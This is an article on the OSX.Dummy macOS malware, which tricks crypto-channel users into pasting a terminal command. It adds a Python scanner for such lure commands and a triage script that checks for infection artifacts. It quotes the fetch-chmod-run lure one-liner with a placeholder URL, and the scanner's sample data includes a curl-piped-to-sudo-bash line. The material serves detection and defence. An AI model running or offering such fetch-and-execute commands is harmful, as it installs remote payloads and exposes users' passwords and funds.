Last week, Dutch computer security researcher Remco Verhoef discovered a new piece of malware aimed at a fairly specific group: macOS users who frequent cryptocurrency-focused Slack and Discord channels. Outlined in a post on BleepingComputer, the malware, nicknamed OSX.Dummy after a file it drops in the infected machine's /tmp directory, is unusual in that it depends on a bit of social engineering to work. Rather than exploiting a software flaw, it tricks the user into downloading and running the malware themselves, which sidesteps several macOS protections: a binary fetched with curl carries no quarantine attribute, so Gatekeeper never examines it, and the victim hands over the root password voluntarily.
The OSX.Dummy attack works like this: the attacker quietly joins a Discord or Slack chat posing as a moderator or admin and offers seemingly helpful advice to users facing technical issues. The scammer then urges the victim to run a command in the Mac terminal, claiming it will solve the problem. Once entered, the command downloads a 34 MB binary to the computer's /tmp folder and runs it; the program then asks for the user's password, which gives it root privileges.
Here is the command, with the malicious download link replaced by a placeholder:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
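The shape of that lure command is easy to recognise mechanically, which is useful if you moderate a channel where people paste "fixes" at each other. The scanner below is an added example, not code from the original post or from the researchers it cites. It flags the download-then-execute pattern of the OSX.Dummy one-liner and, going beyond the page, the more common curl-pipe-to-shell variant. The sample messages, URLs and variable names are constructed for the example.

```python
"""Heuristic scanner for 'paste this into your terminal' lure commands.

Added example, not code from the original post or the analysis it cites.
It keys on the shape of the command (fetch, then execute what was fetched),
not on any particular URL or file name.
"""
import re

# Constructed sample chat messages. The first is the OSX.Dummy one-liner
# quoted above, download link replaced by a placeholder variable.
SAMPLE_MESSAGES = {
    "dummy": "cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script",
    "piped": "try this, it fixed it for me: curl -fsSL https://example.invalid/fix.sh | sudo bash",
    "fetch_only": "curl -s https://example.invalid/status.json",
    "benign": "brew update && brew upgrade",
}

FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
REDIRECT_RE = re.compile(r">\s*(\S+)")                        # fetched bytes -> file
CHMOD_RE = re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\s+(\S+)")  # file made executable
PIPE_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")  # curl ... | sh


def analyze(command: str) -> dict:
    """Return {'suspicious': bool, 'reasons': [...]} for one pasted command."""
    reasons = []
    fetch = FETCH_RE.search(command)
    if fetch is None:
        return {"suspicious": False, "reasons": reasons}
    tail = command[fetch.end():]          # everything after the downloader

    piped = PIPE_SHELL_RE.search(tail) is not None
    if piped:
        reasons.append("download piped straight into a shell")

    executed = False
    redirect = REDIRECT_RE.search(tail)
    if redirect:
        target = redirect.group(1)
        base = target.rsplit("/", 1)[-1]
        chmod = CHMOD_RE.search(tail)
        made_exec = chmod is not None and chmod.group(2).endswith(base)
        # a later command word that runs the file: ./script, /tmp/script, sudo ./script
        run_re = re.compile(
            r"(?:&&|;|\|\|)\s*(?:sudo\s+)?(?:\./|/tmp/)?" + re.escape(base) + r"(?:\s|$)"
        )
        executed = made_exec and run_re.search(tail) is not None
        if executed:
            reasons.append(f"download written to {target!r}, made executable and run")

    if re.search(r"\bsudo\b", command):
        reasons.append("asks for sudo (root) privileges")
    if re.search(r"(?:^|\s)cd\s+/tmp\b|/tmp/", command):
        reasons.append("stages the payload in /tmp")

    return {"suspicious": piped or executed, "reasons": reasons}


def scan(messages: dict) -> dict:
    """Analyze every message and return only the suspicious ones."""
    results = {key: analyze(text) for key, text in messages.items()}
    return {key: r for key, r in results.items() if r["suspicious"]}


if __name__ == "__main__":
    for key, verdict in scan(SAMPLE_MESSAGES).items():
        print(key, "->", "; ".join(verdict["reasons"]))
```

analyze() deliberately ignores the URL, since the attacker controls that, and instead asks whether whatever was fetched gets executed. A plain fetch (the "fetch_only" sample) is not flagged. Download forms such as curl -o or wget -O are not covered and would need one more pattern of the same kind.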
Once OSX.Dummy has been downloaded and launched, the program uses its root-level access to configure itself to launch every time the OS reboots, then connects to a server under the attacker's control, giving the attacker full access to the infected computer. On top of that, OSX.Dummy saves the root password in a plaintext file at /tmp/dumpdummy. If the infection isn't fully removed, a later piece of malware could simply read that file and regain root access without ever having to ask the user again.
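To check a Mac for the artifacts just described, here is an added Python triage helper; it is not from the original post or the cited analysis. It looks for the password dump at /tmp/dumpdummy, the dropped binary at /tmp/script, and any launch daemon or agent whose program lives in /tmp, which is a reasonable generic check for the reboot persistence described above. build_fixture() creates a constructed fake filesystem so the script also runs offline; the plist label it writes is made up for the fixture and is not the malware's.

```python
"""Triage helper for the OSX.Dummy artifacts described in the text.

Added example, not code from the original post or the analysis it cites.
Run find_artifacts("/") on a real Mac; build_fixture() produces a
constructed stand-in filesystem so the same code runs anywhere.
"""
import os
import plistlib
import stat
import tempfile

PASSWORD_DUMP = "tmp/dumpdummy"          # plaintext root password (from the text)
DROPPED_BINARY = "tmp/script"            # the downloaded payload (from the command above)
LAUNCH_DIRS = ("Library/LaunchDaemons", "Library/LaunchAgents")


def _world_readable(path: str) -> bool:
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def find_artifacts(root: str) -> list:
    """Return a list of {'path', 'why'} findings under `root`."""
    findings = []

    dump = os.path.join(root, PASSWORD_DUMP)
    if os.path.isfile(dump):
        why = "plaintext root password dump"
        if _world_readable(dump):
            why += " (world-readable: any later process can reuse it)"
        findings.append({"path": dump, "why": why})

    binary = os.path.join(root, DROPPED_BINARY)
    if os.path.isfile(binary):
        size_mb = os.path.getsize(binary) / (1024 * 1024)
        findings.append({"path": binary, "why": f"dropped payload, {size_mb:.1f} MB"})

    # Generic persistence check: a launchd job whose program lives in /tmp.
    for d in LAUNCH_DIRS:
        full = os.path.join(root, d)
        if not os.path.isdir(full):
            continue
        for name in sorted(os.listdir(full)):
            if not name.endswith(".plist"):
                continue
            p = os.path.join(full, name)
            try:
                with open(p, "rb") as f:
                    plist = plistlib.load(f)
            except Exception:
                findings.append({"path": p, "why": "unparseable launch plist"})
                continue
            args = list(plist.get("ProgramArguments", []))
            if plist.get("Program"):
                args.insert(0, plist["Program"])
            if any(str(a).startswith("/tmp/") for a in args):
                findings.append({"path": p, "why": "persistence running out of /tmp: " + " ".join(map(str, args))})
    return findings


def build_fixture() -> str:
    """Constructed fake filesystem root mimicking an infected host (test data only)."""
    root = tempfile.mkdtemp(prefix="dummy-triage-")
    os.makedirs(os.path.join(root, "tmp"))
    os.makedirs(os.path.join(root, "Library/LaunchDaemons"))
    with open(os.path.join(root, PASSWORD_DUMP), "w") as f:
        f.write("hunter2\n")                       # placeholder password, constructed
    os.chmod(os.path.join(root, PASSWORD_DUMP), 0o644)
    with open(os.path.join(root, DROPPED_BINARY), "wb") as f:
        f.write(b"\xcf\xfa\xed\xfe" + b"\0" * 1024)  # 64-bit Mach-O magic plus padding, constructed
    # Label is invented for the fixture; it is not the malware's real plist name.
    with open(os.path.join(root, "Library/LaunchDaemons/com.example.fixture.plist"), "wb") as f:
        plistlib.dump({"Label": "com.example.fixture",
                       "ProgramArguments": ["/tmp/script"],
                       "RunAtLoad": True}, f)
    return root


if __name__ == "__main__":
    for finding in find_artifacts(build_fixture()):
        print(finding["path"], "->", finding["why"])
```

The /tmp check on launchd jobs is the part worth keeping in your general toolbox: legitimate software does not persist a binary out of a scratch directory, so any hit there deserves a look regardless of which malware family it belongs to. Deleting the binary and the plist but leaving /tmp/dumpdummy behind is exactly the half-cleanup the text warns about.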
The full capabilities of OSX.Dummy aren’t known, but given that the scam was first discovered in cryptocurrency-focused Slack and Discord channels, the basic intent seems clear. As Malwarebytes’ Mac security expert Thomas Reed told BleepingComputer, “It’s a fair bet that they were interested in theft of cryptocurrency.”
Malware-downloading scams like OSX.Dummy are becoming more common and more sophisticated. If your cryptocurrency is stored on your computer in a desktop wallet application, every malware infection is a serious threat to your tokens. The safest option is to take your computer out of the equation and store your BTC, ETH and other cryptocurrencies on a hardware wallet, which keeps the private keys on the device and signs transactions there, so a compromised computer never sees them. One caveat: the computer still prepares the transaction, so always confirm the destination address and amount on the wallet's own screen before approving, since malware on the host can swap them.